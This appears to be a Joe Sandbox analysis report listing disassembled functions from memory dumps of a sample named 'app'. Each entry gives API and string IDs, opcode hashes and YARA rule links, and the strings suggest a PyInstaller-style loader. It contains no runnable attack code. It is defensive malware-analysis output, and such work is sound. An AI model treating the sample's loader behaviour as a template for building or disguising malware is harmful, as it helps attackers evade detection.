                                                                                                                                                                                                            • Instruction ID: 9874195b19f931642b2948c418bcb67133d8b5ed1a2e4c95dbfbb5325ab004ce
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e520d116f7293a8a270f7d40ac50cfd797ff5e1af0e1af78d5752c8ba321e0ac
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20315A7260AB819AEB608F70E8403ED7360FB94788F44403ADA4E47B98EF7CD658C754
                                                                                                                                                                                                            Function 00007FF8A7E71960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285221052.00007FF8A7E71000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF8A7E70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285204631.00007FF8A7E70000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285237784.00007FF8A7E73000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285254997.00007FF8A7E74000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285271778.00007FF8A7E75000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7e70000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                            • Opcode ID: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
                                                                                                                                                                                                            • Instruction ID: d316ae8715480369b76373a76b5c272e5c93bd83e8c74ca4b617154273d22ca4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C431927260ABC199EB608F64E8403ED7365FB84B88F44443ADA4D57B94EF3CD658D710
                                                                                                                                                                                                            Function 00007FF8A7E91960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285379193.00007FF8A7E91000.00000020.00000001.01000000.00000039.sdmp, Offset: 00007FF8A7E90000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285360814.00007FF8A7E90000.00000002.00000001.01000000.00000039.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285396806.00007FF8A7E94000.00000002.00000001.01000000.00000039.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285413947.00007FF8A7E95000.00000004.00000001.01000000.00000039.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285430029.00007FF8A7E96000.00000002.00000001.01000000.00000039.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7e90000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                            • Opcode ID: 8cd5be0b42e6e7f0319df2977d08f00477f2cc742b936249396d47c5008990bc
                                                                                                                                                                                                            • Instruction ID: 27a8ae6056dc9a47cda1709664ae81708c38234ae41a837990415bee19c3e142
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cd5be0b42e6e7f0319df2977d08f00477f2cc742b936249396d47c5008990bc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94314173609E8195EB608FA4E8507EEB3A1FB45B88F44403ADA4D47B94DF3CD658D710
                                                                                                                                                                                                            Function 00007FF7ACE86760 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,00000000,?,00007FF7ACE8672D), ref: 00007FF7ACE867FA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: GetEnvironmentVariableW.KERNEL32(00007FF7ACE836C7), ref: 00007FF7ACE869AA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7ACE869C7
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE965E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACE965FD
                                                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF7ACE868B1
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82770: MessageBoxW.USER32 ref: 00007FF7ACE82841
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                            • API String ID: 3752271684-1116378104
                                                                                                                                                                                                            • Opcode ID: 4828d69836246918269f07bf884f0db2084dfee84ed506a5a3d02a588ff47569
                                                                                                                                                                                                            • Instruction ID: 10888fb71a76abedbea3f54483dca49de9895716b1a06f1e90fd6b8427e96a6c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4828d69836246918269f07bf884f0db2084dfee84ed506a5a3d02a588ff47569
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A51C235B0F68374FE54B7269A162BAE2559F44BC1FC65031EC0E6B7B6EE2CE4018720
                                                                                                                                                                                                            Function 00007FF8A81789E0 Relevance: 12.3, APIs: 8, Instructions: 266COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                            • Opcode ID: 514c606d78c05e2b4ea6996c4e008d1419102a49b6ef7a30e12193a32fc8e760
                                                                                                                                                                                                            • Instruction ID: f9bc61dc9d8452a98c9b45d105302d74e994a904678ae6e7310608fdaacfe565
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 514c606d78c05e2b4ea6996c4e008d1419102a49b6ef7a30e12193a32fc8e760
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BC12821E0AE8595E6538B3490413B9A365FF657D4F158332E54F32640EF3CF4A3CA28
                                                                                                                                                                                                            Function 00007FF7ACE8B5DC Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                            • Opcode ID: fbdfe3cbec041ac85cd1f64ea4b15fcfe09a87be1aa09ac25d8a719fe1a921a3
                                                                                                                                                                                                            • Instruction ID: 5cdc8236ba3edd1a04c0d69f64c4cd58851fee1a70d465b1c8bdee2caf4207c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fbdfe3cbec041ac85cd1f64ea4b15fcfe09a87be1aa09ac25d8a719fe1a921a3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4031727360DB8199EB609F60E8803EDB361FB44745F854039DA4E67BA8DF38D548CB20
                                                                                                                                                                                                            Function 00007FF7ACE99A14 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                            • Opcode ID: e7141d2691e6fffc336151182819a094942dc067ac16da689744b042d81b35af
                                                                                                                                                                                                            • Instruction ID: 524421e0cbc9ec56c27415ba1cb9c979d7c052f119fd1ead870d0783ffa5ae5e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7141d2691e6fffc336151182819a094942dc067ac16da689744b042d81b35af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6231B43361DB81A6EB60DF24E8402AEB3A0FB88755F850135EA8D53BA4DF3CC555CB10
                                                                                                                                                                                                            Function 00007FF8A800DED0 Relevance: 7.9, APIs: 6, Instructions: 360COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memmove$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3790616698-0
                                                                                                                                                                                                            • Opcode ID: d38339a1fa69ae93e881e34f82764f7fb8b25ad2ebc99717183724d7faf9ce3a
                                                                                                                                                                                                            • Instruction ID: 8212cae5b616699ff12ce979cdb312046166c7d84bec3b2e29fbea83f16fc1f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d38339a1fa69ae93e881e34f82764f7fb8b25ad2ebc99717183724d7faf9ce3a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50E12732E0EA8295EF64EA25A5043B96661FB41BE4F484331DE5D277C9CF3CE560C329
                                                                                                                                                                                                            Function 00007FF8A8156900 Relevance: 7.8, APIs: 5, Instructions: 330COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d986cd0ab5317f4a3b1b976a0db30a1a9a1ca54cf71bc41686f59a844fc28997
                                                                                                                                                                                                            • Instruction ID: a27f7351eee5ffbc99974ec096bba651336192f950c9e86c05f20e6d5e2b7935
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d986cd0ab5317f4a3b1b976a0db30a1a9a1ca54cf71bc41686f59a844fc28997
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28E10731A19E859AE71B8B34D040379B365FFA97C4F549332E68F22754EF3CA482CA54
                                                                                                                                                                                                            Function 00007FF8A81573E0 Relevance: 7.8, APIs: 5, Instructions: 330COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 8d7cb500461f40d2d6a52e866c58501b6e73d209b4066772ae3d5bb95b1305d4
                                                                                                                                                                                                            • Instruction ID: f268497dc374b5ff793e9035834acc9b5f8f1acff9bbcfc3e869bc5c0cca0d4c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d7cb500461f40d2d6a52e866c58501b6e73d209b4066772ae3d5bb95b1305d4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9AE12931A19F818AE71B8B38E101779A395FFA97C4F145732D64F62754EF3CA482CA14
                                                                                                                                                                                                            Function 00007FF7ACEA08E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                            • Opcode ID: 15b37066209686d126a4855257e5fe5093a8358f256cf270ac53eceea75e82af
                                                                                                                                                                                                            • Instruction ID: c9f3e98de7364faefdf41d73c3130f2a03373d05b88e5e864d0b95272ff02b72
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15b37066209686d126a4855257e5fe5093a8358f256cf270ac53eceea75e82af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4B1B632B1E6826DEA61AB2195002B9E390EF44BD5F8A5131ED5E27BE5DF3CE441C310
                                                                                                                                                                                                            Function 00007FF8A8172B10 Relevance: 6.1, APIs: 4, Instructions: 143COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: log2$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3759962277-0
                                                                                                                                                                                                            • Opcode ID: d7c82d7eb5ed4bbf6f45e46b1924f1e12311d618bba5931698bcaf2d9eae93d8
                                                                                                                                                                                                            • Instruction ID: d2180dff0526a4f05fe63036b7215546a9f47c0fd6e712919efa7b55d8c3dc31
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7c82d7eb5ed4bbf6f45e46b1924f1e12311d618bba5931698bcaf2d9eae93d8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA513721E1AE8559E6138B349041375E365EF757D4F19C336DA4F32A01FF2DA493CA28
                                                                                                                                                                                                            Function 00007FF8A7E92EC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 287COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285379193.00007FF8A7E91000.00000020.00000001.01000000.00000039.sdmp, Offset: 00007FF8A7E90000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285360814.00007FF8A7E90000.00000002.00000001.01000000.00000039.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285396806.00007FF8A7E94000.00000002.00000001.01000000.00000039.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285413947.00007FF8A7E95000.00000004.00000001.01000000.00000039.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285430029.00007FF8A7E96000.00000002.00000001.01000000.00000039.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7e90000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _wassert
                                                                                                                                                                                                            • String ID: OCB_ENCRYPT==direction || OCB_DECRYPT==direction$src/raw_ocb.c
                                                                                                                                                                                                            • API String ID: 3234217646-1106498308
                                                                                                                                                                                                            • Opcode ID: bbf22bfe169d78c2ac09731688de6daaf5fe930a6b0cbf5783ca536d68021edf
                                                                                                                                                                                                            • Instruction ID: 1682201c21ebf61d3f1f795ec3bb62eee3007d83f4582919197ce4966047fd93
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbf22bfe169d78c2ac09731688de6daaf5fe930a6b0cbf5783ca536d68021edf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19E14A5310E6D059C7168FB590202BE7FF0DB1BA59F4D80B6EBE84E58BD50CC254EB2A
                                                                                                                                                                                                            Function 00007FF8A8172D70 Relevance: 5.1, APIs: 4, Instructions: 147COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                            • Opcode ID: 989cb14306d5d96352166a30740da91af251197d5d77a06408e0a69cb93c0577
                                                                                                                                                                                                            • Instruction ID: 1cb7487b948f0a7cd97250a80f73b8a2e04ed0733190f43589168fcbeae6241c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 989cb14306d5d96352166a30740da91af251197d5d77a06408e0a69cb93c0577
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF51B332609AD19AE7628B22D810BF977A1F7457C9F444026EE8D56B89DF3CC206CB14
                                                                                                                                                                                                            Function 00007FF7ACE83DD0 Relevance: 291.0, APIs: 55, Strings: 111, Instructions: 457libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc
